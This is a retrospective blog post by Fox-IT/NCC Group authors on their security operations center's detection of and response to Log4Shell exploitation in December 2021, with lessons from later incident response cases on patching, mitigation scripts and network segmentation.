Authored by Edwin van Vliet and Max Groot
One year ago, Fox-IT and NCC Group released their blogpost detailing findings on detecting & responding to exploitation of CVE-2021-44228, better known as ‘Log4Shell’. Log4Shell was a textbook example of a code red scenario: exploitation was trivial, the software was widely used in all sorts of applications accessible from the internet, patches were not yet available and successful exploitation would result in remote code execution. To make matters worse, advisories heavily differed in the early hours of the incident, resulting in conflicting information about which products were affected.
Due to the high-profile nature of Log4Shell, the vulnerability quickly drew the attention of both attackers and defenders. This wasn’t the first time such a ‘perfect storm’ has taken place, and it will definitely not be the last one. This 1-year anniversary seems like an appropriate time to look back and reflect on what we did right and what we could do better next time.
Reflection firstly requires us to critically look at ourselves. Thus, in the first part of this blog we will look back at how our own Security Operations Center (SOC) tackled the problem in the initial days of the ‘code red’. What challenges did we face, what solutions worked, and what lessons will we apply for the next code red scenario?
The second part of this blog discusses the remainder of the year. Our CIRT has since been contacted by several organizations that were exploited using Log4Shell. Such cases ranged from mere coinminers to domain-wide ransomware, but there were several denominators between those cases that provide insight in how even a high-profile vulnerability such as Log4Shell can go by unnoticed and result in a compromise further down the line.
Within our SOC we are tasked with detecting attacks and informing monitored customers with actionable information in a timely manner. We do not want to call them for generic internet noise, and they expect us to only call when a response on their end is necessary. We have a role that is restricted to monitoring: we do not segment, we do not block, and we do not patch. During the Log4Shell incident, our primary objective was to keep our customers secure by identifying compromised systems quickly and effectively.
The table below summarizes the most important actions we undertook in response to the emergency of the Log4Shell vulnerability. We will reflect further on these events to discuss why we took certain decisions, as well as consider what we could have done differently and what we did right.
Estimated Time (UTC) | Event |
2021-12-09 22:00 (+0H) | Proof-of-Concept for Log4Shell exploitation was published on Github |
2021-12-10 08:00 (+10H) | Push experimental Suricata rule to detect exploitation attempts |
2021-12-10 12:30 (+14,5H) | Finish tool that harvests IOC’s out of detected exploitation attempts, start hunting across all platforms |
2021-12-10 15:00 (+17H) | Behavior-based detection picks up first successful hack using Log4Shell |
2021-12-10 21:00 (+23H) | Transition from improvised IOC hunting to emergency hunting shifts |
2021-12-11 10:00 (+36H) | Report first incidents based on hunting to customers |
2021-12-12 16:00 (+42H) | Send advisory, status update and IOCs to SOC customers |
2021-12-12 17:00 (+43H) | Add Suricata rule to testing that can distinguish between failed and successful exploitation in real-time |
2021-12-13 08:00 (+58H) | Determine that real-time detection works, move to production |
2021-12-13 08:10 (+58H) | Decide to publish all detection & IOC’s as soon as possible |
2021-12-13 14:00 (+62H) | Refactor IOC harvesting tool to keep up with exploitation volume |
2021-12-13 14:30 (+62,5H) | Another successful hack found using hunting procedure |
2021-12-13 19:30 (+67,5H) | Publish all detection and IOC’s in Log4Shell blog |
2021-12-13 21:00 (+69h) | End emergency hunting procedure |
2021-12-14 06:30 (+80,5H) | Successful hack detected using Suricata rule |
On Thursday evening, a proof-of-concept was published on GitHub that made it trivial for attackers to exploit Log4Shell. As we became aware of this on Friday morning, our first point of attention was getting visibility. As we monitor networks with significant exposure to the internet, we anticipated that exploitation attempts would be coming quickly and in vast volumes. One of the first things we did was add detection for exploitation attempts. While we knew that we cannot manually investigate every exploitation attempt, detecting them in the first place would allow us to have a starting point for a threat hunt, add context to other alerts, and give us an idea how this vulnerability is being exploited in the wild. Of course, methods of gaining visibility differ for every SOC and even per threat scenario, but if you can deploy measures to increase visibility, these will often help you out for the remainder of your response process.
While we would have preferred to have full detection coverage immediately, that is often not realistic. We hoped that by detecting exploitation attempts, we would be pointed in the right direction for finding additional detection opportunities.
For the Log4Shell vulnerability, there was an additional benefit. Exploitation of Log4Shell is a multi-step process, where upon successful exploitation of the vulnerability the vulnerable Log4J package will reach out to an attacker-controlled server to retrieve the second-stage payload. This multi-step exploitation process is to the advantage of defenders: initial exploitation attempts will contain the location of the attacker-controlled server that hosts the second-stage payload. This made it possible to automatically retrieve and process the exploitation attempts that were detected. This could then be used to generate a list of high-confidence Indicators of Compromise (IOCs). After all, a connection to a server hosting a second-stage payload could be a strong indicator that a successful exploitation had occurred.
We started regularly mining these IOCs and using them as input for emergency threat hunting. Initially this hunting process was a bit freeform, but we quickly realized we would be doing multiple of such emergency threat hunts for the coming days. We initiated a procedure to perform emergency hunting shifts leveraging our SOC analysts on-duty to perform IOC checks and hunting the networks of customers where these IOCs were found.
We were aware that this ‘emergency threat hunting’ approach was not failproof, for a multitude of reasons:
It was clear that this approach wouldn’t last us all weekend. However, this procedure allowed us the much-needed time to dive deeper into the vulnerability and investigate how to detect it ‘on the wire.’ Mining IOCs was the ‘quick win’ solution that worked for us, but this might be different for others. The importance of quick wins should not be underestimated: quick wins help to buy you some time while you move to solutions that are suited for the long term.
Saturday was a day for experimentation: we knew that what we really wanted was to be able to distinguish unsuccessful exploitation attempts from successful ones in real time. At this point, the whole internet was regularly being scanned for Log4Shell, and the alerts were flooding in. It was impossible to manually investigate every exploitation attempt. Real time distinction between a failed and a successful exploitation attempt would allow us to respond quickly to incoming threats. Moreover, it would also allow us to phase out the emergency hunting shifts, that were placing a heavy burden on our SOC analysts.
While we were researching the vulnerability, we got an alert about a suspicious download occurring in a customer network. The alert that had triggered was based on a generic rule that monitors for suspicious downloads from rare domains. This download turned out to be post-exploitation activity following remote code execution that had been obtained using Log4Shell. The compromised system hadn’t come up yet in our threat hunting process, but the post-exploitation activity had been detected using our ruleset for generic malicious activity. While signatures for vulnerability exploitation are of great value, they work best in conjunction with detection for generic suspicious activity. In a code red scenario, many attackers will likely fall back on tooling and infrastructure they have used prior. Thus, for code reds, having generic detection in place is crucial to ‘fill the gaps’ while you are working on tightening your defenses.
Researching how to detect the vulnerability ‘over the wire’ took time and resources. We had reproduced the exploit in our local lab and combined with the PCAP from the observed ‘in the wild’ hack, we had what we needed to work on detection that could distinguish successful from failed exploitation attempts.
Halfway through Saturday, we pushed an experimental Suricata rule that appeared promising. This rule could detect the network traffic that Log4J generates when reaching out to attacker-controlled infrastructure. Therefore, the rule should only trigger on successful exploitation attempts, and not on failed ones. While this worked great in testing, it takes some time to know for sure whether this detection will hold up in production. At that point, the waiting game began. Will this detection yield false positives? Will it trigger when it needs to?
Something we should have done better at this stage of the ‘code red’ is inform our customers what we had been doing. When it comes to sending advisories to our customers, we often find ourselves conflicted. Our rule of thumb is that we only send an advisory when we feel that we have something meaningful to add that our customers do not know yet. Thus, we had not sent a ‘patch everything as soon as possible’ advisory to our customers, as this felt redundant. Having said that, sending something of an update at an earlier stage about what we had been doing would have been better for our customers.
On Saturday evening, more than 36 hours after we had started collecting IOC’s & threat hunting, we informed our customers about what we had been doing up until that point. We provided IOCs and explained what we had done in terms of detection. We referred to advisories & repositories made by others when it came to patching & mitigation. In hindsight, we should have an update earlier about where we would focus our efforts. Giving an update earlier would have allowed customers to focus their efforts elsewhere, knowing what part of the responsibility we would take up during the code red. After all, proactively informing those that depend on you for their own defense, greatly reduces the amount of redundant work that is being done across the line.
On Sunday, we had our detection of real-time exploitation working. We knew that it worked as it had triggered several times on systems that had been targeted with Log4Shell exploitation attempts. These systems were segmented in a way where they could not set up connections to external servers, preventing them from successfully retrieving the second-stage payload. However, these systems were still highly vulnerable and exposed and thus we reported such instances as soon as we could.
On Sunday morning, the Dutch National Cyber Security Center (NCSC-NL) assembled all companies part of ‘Cyberveilig Nederland,’ an initiative that Fox-IT participates in. NCSC-NL had set up a repository where cybersecurity companies could document information on this vulnerability, including the identification of software that could be exploited.
This central repository made it a lot easier for us to share our work in a way where we knew others could easily find it within the larger context of the Log4Shell incident. Such a ‘central repository’ allows organizations such as ourselves to focus on the things they are good at. We are not specialized in patching but know a thing or two about writing detection and responding to identified compromise. Collaboration is key during a code red. Organizations should contribute based on their own specialties so that redundant work can be avoided.
At the start of the day, we had unanimously agreed to publish all our detection as soon as possible, preferably that same day. This was when we started writing our blog. One complication was that we were more than 60 hours underway, and fatigue was kicking in. This was also the time to ‘bring in the reinforcements’ and ask others to review our work. IOCs were double-checked, and tools that had been quickly scrapped together were refactored to keep up with the volume of alerts. We released the blogpost at about 8PM, a little later than we had aimed for. With the release of our blogpost, we could share all knowledge we had acquired over the weekend with the security community. We chose to focus on what we know best: network detection and post-exploitation detection. With real-time detection in place, we had our first response done. Over the following weeks, we would continue to work on detecting exploitation, as well as do additional research such as identifying varying payloads used in the wild and releasing the log4-jfinder.
As a summary, the below timeline highlights the key events in our first 72 hours responding to Log4Shell. All blue events are related to detection engineering, whereas green & red identify key moments in decision-making. You can click on the timeline for an enlarged view.
While the high-profile nature of the Log4Shell vulnerability alerted almost everyone that action had to be taken initially, Log4Shell turned out to be a vulnerability with a ‘long tail’. In the year that followed, off-the-shelf exploits would become available for several products, and some mitigations that were released initially turned out to be insufficient for the long run. The next section will therefore approach Log4Shell from the incident response perspective: what did we find when we were approached by organizations that had had trouble mitigating?
In the past year, we responded to several incidents where the Log4Shell vulnerability was part of the root cause. In this retrospective we will compare those incidents to the expectations that we had in the security industry. We were expecting many ransomware incidents resulting from this initial attack vector. Was this expectation grounded?
The incident response cases we investigated can largely be divided into four categories. It should be noted that often times, multiple distinct threat actors had left their traces on the victim’s systems. It was not uncommon that we were able to identify activities in multiple of the following categories on the same system:
We compared the various recommendations that we provided in these incident response cases. All the incidents that led to an engagement of our incident response teams could have been prevented if:
As always, reality is a little more nuanced. We will elaborate a bit in the following two sections.
In follow-up conversations with organizations that contacted our CIRT, we noticed a pattern that many of them had heard of Log4Shell but believed they were safe. The most common reason for their false sense of safety is a very unfortunate series of events related to patch and lifecycle management.
For example, one vendor had released both a security update and a mitigation script, the latter being for organizations that were not able to immediately apply the security update. On several incident response engagements, we found administrators who had executed the script and thought they were safe, unaware that the vendor had later released new versions of the mitigation script. The first version of the mitigation script apparently did not completely resolve the problem. The newer mitigation scripts performed many more operations that were required to protect against Log4Shell, including for example modifying the Log4J jar-file. As a result of this, several victims were not aware they were still running vulnerable software.
We also encountered incidents where administrators kept delaying the security upgrades or performed the upgrade but had to roll back to a snapshot due to technical issues after the upgrade. The rollback restored the old situation in which the software was still vulnerable.
The lesson here is that clear communication from vendors about vulnerabilities and mitigation is key. For end users, a mitigation script or action is almost always less preferable than applying the security update. Mitigation scripts should be considered to be quick wins, not long-term solutions.
The other major mitigation that could have prevented several incidents was network segmentation. Exploitation of this type of vulnerability requires outbound network connections to download a secondary payload. Therefore, in a network segment where connections are heavily regulated, this attack simply would not work.
In server networks, a firewall should typically block all connections by default. Only some connections should be allowed, based on source and/or destination addresses and ports. Of course, in this modern world, cloud computing often requires larger blocks of IP space to be allowed. The usual solution is to configure proxy servers that allow downloading security updates or connecting to cloud services based on domain names.
In a few cases, the initial attempts by malicious actors were unsuccessful, because the outgoing connections were blocked or hindered by the customer’s network infrastructure. However, with later “improvements” some attackers managed to bypass some of the mechanisms (for example, hosting the payload on the often allow-listed port 443), or they found vulnerable services on non-standard ports. Those cases prove it was a race against the clock, because attackers were also improving their techniques.
Besides actively blocking outgoing connections, the firewalls offer insight due to the log entries they emit. Together with network monitoring they can immediately single out vulnerable devices. And possibly the biggest advantage of strict network segmentation: they counter zero-days of this entire category of vulnerabilities. A zero-day is not necessarily something that is only used by advanced attackers. Some software that is widely in use today will contain vulnerabilities that nobody knows about yet. If such a vulnerability is discovered by a malicious actor, an exploit may be available before a security update. That is one of the main reasons why we should value strict network segmentation: it provides an additional layer of defense.
Looking back, we have dealt with far fewer incidents than we had initially expected. Does this mean that we were overly pessimistic? Or does it mean that our “campaign” as a security industry was very effective? We like to believe the latter. After all, almost everybody who needed to know about the problem knew about it.
Having said that, one risk we are all taking is the risk of numbing our audience. We need to be conservative sending out ‘code red’ security advisories to prevent the “boy who cried wolf” syndrome. Nowadays it sometimes seems like the security industry does not take their end users seriously enough to believe that they will act on vulnerabilities that do not have a catchy name and logo.
In this case, we as a security community gave Log4Shell a lot of attention. We think this was justified. The vulnerability was easy to exploit with PoC code available, and the Log4J component was used in many software products. Moreover, we saw widespread exploitation in the wild, albeit mostly using off-the-shelf exploits for products that use Log4J.
Our role within the security industry comes with the responsibility to inform. With a component as widespread as Log4J, it is very difficult to provide specific advice. It’s the software vendors whose software uses these components who need to provide more specific security advisories. Their advisories need to be actionable. We think that for the general public, it is best to closely follow those specific advisories for products they might be using.
As security vendors, repeating information that is already available can only lead to confusion. Instead, we should contribute within our own areas of expertise. For the next code red, we know what we’ll do: focus our efforts where we have something to add, and stay out of areas where we do not. Bring it on!